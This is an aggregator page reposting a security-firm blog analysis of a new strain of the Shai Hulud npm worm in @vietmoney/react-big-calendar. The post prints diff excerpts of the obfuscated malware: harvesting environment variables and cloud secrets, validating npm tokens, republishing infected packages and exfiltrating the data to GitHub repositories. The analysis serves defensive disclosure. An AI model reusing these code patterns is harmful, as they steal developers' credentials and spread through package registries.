惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Microsoft Azure Blog
Microsoft Azure Blog
V
V2EX
博客园 - 【当耐特】
WordPress大学
WordPress大学
爱范儿
爱范儿
美团技术团队
宝玉的分享
宝玉的分享
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
小众软件
小众软件
量子位
Hugging Face - Blog
Hugging Face - Blog
B
Blog RSS Feed
Recorded Future
Recorded Future
Engineering at Meta
Engineering at Meta
雷峰网
雷峰网
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
M
MIT News - Artificial intelligence
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
博客园 - 聂微东
H
Hackread – Cybersecurity News, Data Breaches, AI and More
腾讯CDC
大猫的无限游戏
大猫的无限游戏
Jina AI
Jina AI
博客园 - 叶小钗
GbyAI
GbyAI
Y
Y Combinator Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
F
Full Disclosure
G
Google Developers Blog
D
Docker
T
Tailwind CSS Blog
C
Check Point Blog
Last Week in AI
Last Week in AI
人人都是产品经理
人人都是产品经理
T
The Blog of Author Tim Ferriss
B
Blog
博客园 - 三生石上(FineUI控件)
博客园 - Franky
H
Help Net Security
MyScale Blog
MyScale Blog
U
Unit 42
D
DataBreaches.Net
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
I
InfoQ
阮一峰的网络日志
阮一峰的网络日志
The GitHub Blog
The GitHub Blog
L
LangChain Blog
有赞技术团队
有赞技术团队
Martin Fowler
Martin Fowler
Microsoft Security Blog
Microsoft Security Blog

Aikido Security's Blog

Axios CVE-2026-40175: a critical bug that’s… not exploitable GlassWorm goes native: New Zig dropper infects every IDE on your machine Aikido Attack finds multiple 0-days in Hoppscotch The cybersecurity doomerism around Mythos doesn't match what we see on the ground axios compromised on npm: maintainer account hijacked, RAT deployed Popular telnyx package compromised on PyPI by TeamPCP Aikido × Lovable: Vibe, Fix, Ship CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran TeamPCP deploys CanisterWorm on NPM following Trivy compromise Security testing is validating software that no longer exists Aikido Recognized by Frost & Sullivan with the 2026 Customer Value Leadership Award in ASPM GlassWorm Hides a RAT Inside a Malicious Chrome Extension fast-draft Open VSX Extension Compromised by BlokTrooper Glassworm Strikes Popular React Native Phone Number Packages Glassworm Is Back: A New Wave of Invisible Unicode Attacks Hits Hundreds of Repositories How Security Teams Fight Back Against AI-Powered Hackers Introducing Betterleaks, an open source secrets scanner by the author of Gitleaks Trump’s 2026 cybersecurity strategy: From compliance to consequence How does AI pentesting work with compliance? What continuous pentesting actually requires Rare Not Random: Using Token Efficiency for Secrets Scanning Persistent XSS/RCE using WebSockets in Storybook’s dev server Why Determinism Is Still a Necessity in Security WAF vs. RASP vs. ADR Introducing Aikido Infinite: A new model of self-securing software How Aikido secures AI pentesting agents by design Astro Full-Read SSRF via Host Header Injection How to Get Your Board to Care About Security (Before a Breach Forces the Issue) What is Slopsquatting? The AI Package Hallucination Attack Already Happening SvelteSpill: A Cache Deception Bug in SvelteKit + Vercel Top 6 Wiz Code Alternatives Aikido recognized as Platform Leader in Latio Tech's 2026 Application Security Report From detection to prevention: How Zen stops IDOR vulnerabilities at runtime npm backdoor lets hackers hijack gambling outcomes Introducing Upgrade Impact Analysis: When breaking changes actually matter to your code Why Trying to Secure OpenClaw is Ridiculous Claude Opus 4.6 found 500 vulnerabilities. What does this change for software security? Introducing Aikido Expansion Packs: Safer defaults inside the IDE International AI Safety Report 2026: What It Means for Autonomous AI Systems Self-Securing Software: What It Is, Why It Matters, and How It Works npx Confusion: Packages That Forgot to Claim Their Own Name What Is Continuous Pentesting? Introducing Aikido Package Health: a Better Way to Trust Your Dependencies AI Pentesting: Minimum Safety Requirements for Security Testing Secure SDLC for Engineering Teams (+ Checklist) Fake Clawdbot VS Code Extension Installs ScreenConnect RAT G_Wagon: npm Package Deploys Python Stealer Targeting 100+ Crypto Wallets Gone Phishin': npm Packages Serving Custom Credential Harvesting Pages Malicious PyPI Packages spellcheckpy and spellcheckerpy Deliver Python RAT Top 10 AI Security Tools For 2026 Agent Skills Are Spreading Hallucinated npx Commands Understanding Open-Source License Risk in Modern Software The CISO Vibe Coding Checklist for Security Top 6 Graphite alternatives for AI code review in 2026 From “No Bullsh*t Security” to $1B: We Just Raised Our $60m Series B Critical n8n Vulnerability Allows Unauthenticated Remote Code Execution (CVE-2026-21858) Top 14 VS Code Extensions for 2026 AI-Driven Pentesting of Coolify: Seven CVEs Identified Top Continuous Pentesting Tools in 2026 SAST vs SCA: Securing the Code You Write and the Code You Depend On JavaScript, MSBuild, and the Blockchain: Anatomy of the NeoShadow npm Supply-Chain Attack How Engineering and Security Teams Can Meet DORA’s Technical Requirements IDOR Vulnerabilities Explained: Why They Persist in Modern Applications MongoBleed: MongoDB Zlib Vulnerability (CVE-2025-14847) and How to Fix It First Sophisticated Malware Discovered on Maven Central via Typosquatting Attack on Jackson The Fork Awakens: Why GitHub’s Invisible Networks Break Package Security Top 10 Cyber Security Tools For 2026 SAST in the IDE is now free: Moving SAST to where development actually happens AI Pentesting in Action: A TL;DV Recap of Our Live Demo The Top 7 Threat Intelligence Tools in 2026 React & Next.js DoS Vulnerability (CVE-2025-55184): What You Need to Fix After React2Shell OWASP Top 10 for Agentic Applications (2026): What Developers and Security Teams Need to Know DAST vs Pentesting v AI Pentesting: Why DAST Cannot Replace Modern Pentesting PromptPwnd: Prompt Injection Vulnerabilities in GitHub Actions Using AI Agents Top 7 Cloud Security Vulnerabilities Critical React & Next.js RCE Vulnerability (CVE-2025-55182): What You Need to Fix Now How to Comply With the UK Cybersecurity & Resilience Bill: A Practical Guide for Modern Engineering Teams Shai Hulud 2.0: What the Unknown Wonderer Tells Us About the Attackers’ Endgame SCA Everywhere: Scan and Fix Open-Source Dependencies in Your IDE Safe Chain now enforces a minimum package age before install Shai Hulud Attacks Persist Through GitHub Actions Vulnerabilities Shai Hulud Launches Second Supply-Chain Attack: Zapier, ENS, AsyncAPI, PostHog, Postman Compromised CORS Security: Beyond Basic Configuration Revolut Selects Aikido Security to Power Developer-First Software Security The Future of Pentesting Is Autonomous How Aikido and Deloitte are bringing developer-first security to enterprise Secrets Detection: A Practical Guide to Finding and Preventing Leaked Credentials Invisible Unicode Malware Strikes OpenVSX, Again AI as a Power Tool: How Windsurf and Devin Are Changing Secure Coding Building Fast, Staying Secure: Supabase’s Approach to Secure-by-Default Development OWASP Top 10 2025: Official List, Changes, and What Developers Need to Know Top 10 JavaScript Security Vulnerabilities in Modern Web Apps The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositorties Top 7 Black Duck Alternatives in 2026 What Is IaC Security Scanning? Terraform, Kubernetes & Cloud Misconfigurations Explained AutoTriage and the Swiss Cheese Model of Security Noise Reduction Top Software Supply Chain Security Vulnerabilities Explained The Top 7 Kubernetes Security Tools Top 10 Web Application Security Vulnerabilities Every Team Should Know What Is CSPM (and CNAPP)? Cloud Security Posture Management Explained
Shai Hulud strikes again - The golden path
Charlie Eriksen · 2025-12-28 · via Aikido Security's Blog

As of 30 minutes ago, we detected what we believe to be the first instance of a new strain of Shai Hulud, which was uploaded to npm in the package @vietmoney/react-big-calendar :

https://www.npmjs.com/package/@vietmoney/react-big-calendar

It contains a new and novel strain of Shai Hulud. At this time, there does NOT seem to be any major spread or infections. This suggests we may have caught the attackers testing their payload. The differences in the code suggests that this was obfuscated again from original source, not modified in place. This makes it highly unlikely to be a copy-cat, but was made by somebody who had access to the original source code for the worm.

Here we will document what's new.

What's new?

They made a mistake

We have observed that the threat actor made a bug in their code. They changed the file names, but made a mistake:

201424,201425c201387,201388
<           let _0x79fc7c = "https://raw.githubusercontent.com/" + _0x44d2dc + '/' + _0x946d5 + "/main/contents.json";
<           let _0x13d2d2 = await fetch(_0x79fc7c, {
---
>           let _0x20e4ac = "https://raw.githubusercontent.com/" + _0x168165 + '/' + _0x6e4ad4 + "/main/c0nt3nts.json";
>           let _0x34b06b = await fetch(_0x20e4ac, {
210001,210009c209956,209968
...
>   let _0x443533 = _0x43e355.saveContents("c9nt3nts.json", JSON.stringify(_0x594cb1), "Add file");
...

Notice that in the first case, it tries to fetch the file c0nt3nts.json, but it actually saves the file c9nt3nts.json. Oops!

File structure

This new strain of Shai Hulud has a few changes:

  • The initial file is now called bun_installer.js
  • The main payload is called environment_source.js

{{cta}}

New GitHub repository description

When leaking data to GitHub, it now gives the repository the description "Goldox-T3chs: Only Happy Girl".

201406,201407c201369,201370
<       let _0x49fcc3 = await this.octokit.rest.search.repos({
<         'q': "\"Sha1-Hulud: The Second Coming.\"",
---
>       let _0xa94c36 = await this.octokit.rest.search.repos({
>         'q': "\"Goldox-T3chs: Only Happy Girl.\"",

New leaked file names

  • 3nvir0nm3nt.json
  • cl0vd.json
  • c9nt3nts.json
  • pigS3cr3ts.json
  • actionsSecrets.json

Dead man switch gone

The dead man switch appears to be gone, which is good news:

Improved error handling for TruffleHog

It now has better error handling for when TruffleHog times out:

209658,209659c209621,209623
<       let _0x2b320d = setTimeout(() => {
<         _0x51292c.kill();
---
>       let _0x28178f = setTimeout(() => {
>         _0x8a1d5e.kill();
>         _0x15b267(Error("Trufflehog execution timed out after " + this.config.timeout + 'ms'));

Version-dependent package publishing

In the previous version, it tried to call bun to publish a package it had infected, which does not work on Windows. It now handles that.

209511,209514c209474,209477
<       }, ['package']);
<       let _0x3b13f2 = "bun";
<       if (a0_0x647ad2.platform() === "win32") {
<         _0x3b13f2 = "bun.exe";
---
>       }, ["package"]);
>       let _0x4a8bac = "bun";
>       if (a0_0x3a4d5e.platform() === 'win32') {
>         _0x4a8bac = "bun.exe";
209516c209479
<       await Bun.$`npm publish ${_0x4fc35c}`.env({
---
>       await Bun.$`${_0x4a8bac} publish ${_0x21c5dd}`.env({

Ordering of collection of secrets

There's a subtle, but important difference in the order of which data is collected and saved, which suggests an intentional change. Notice that in the old version, it saved the "contents" file first. Now it saves it last.

209986,209990c209945
<   let _0x5bb75d = {
<     'environment': process.env
<   };
<   let _0x6e06c0 = _0x1b7dd4.saveContents("contents.json", JSON.stringify(_0x5735a8), "Add file");
<   let _0x3e4549 = {
---
>   let _0xa50f9e = {
209992c209947
<       'secrets': await _0x30fddc.runSecrets()
---
>       'secrets': await _0x511a7b.runSecrets()
209995c209950
<       'secrets': await _0x79b1b9.listAndRetrieveAllSecrets()
---
>       'secrets': await _0x2efcec.listAndRetrieveAllSecrets()
209998c209953
<       'secrets': await _0x8fa8f.listAndRetrieveAllSecrets()
---
>       'secrets': await _0x390843.listAndRetrieveAllSecrets()
210001,210009c209956,209968
<   let _0x3adc69 = _0x1b7dd4.saveContents("environment.json", JSON.stringify(_0x5bb75d), "Add file");
<   let _0x584734 = _0x1b7dd4.saveContents("cloud.json", JSON.stringify(_0x3e4549), "Add file");
<   let _0xe09164 = await El(_0x4692e0);
<   if (_0x11ccd2 && _0x345f28) {
<     let _0x4012fb = await _0x345f28;
<     if (!_0xe09164.npmTokenValid) {
<       for (let _0x5998e5 of _0x4012fb) if (typeof _0x5998e5 === "object" && _0x5998e5 !== null && !Array.isArray(_0x5998e5)) {
<         for (let [_0x11c4f3, _0x402786] of Object.entries(_0x5998e5)) if (typeof _0x402786 === "string" && _0x402786.startsWith("npm_")) {
<           if (!(await El(_0x402786)).npmTokenValid) {
---
>   let _0x5801a8 = {
>     'environment': process.env
>   };
>   let _0x1c3489 = _0x43e355.saveContents("3nvir0nm3nt.json", JSON.stringify(_0x5801a8), "Add file");
>   let _0x383025 = _0x43e355.saveContents("cl0vd.json", JSON.stringify(_0xa50f9e), "Add file");
>   let _0x443533 = _0x43e355.saveContents("c9nt3nts.json", JSON.stringify(_0x594cb1), "Add file");
>   let _0x5a8131 = await El(_0x587238);
>   if (_0x582c1c && _0x218a2b) {
>     let _0x2eb280 = await _0x218a2b;
>     if (!_0x5a8131.npmTokenValid) {
>       for (let _0x66a856 of _0x2eb280) if (typeof _0x66a856 === "object" && _0x66a856 !== null && !Array.isArray(_0x66a856)) {
>         for (let [_0x8baf81, _0x5cea54] of Object.entries(_0x66a856)) if (typeof _0x5cea54 === 'string' && _0x5cea54.startsWith("npm_")) {
>           if (!(await El(_0x5cea54)).npmTokenValid) {

This is a developing story. Stay tuned.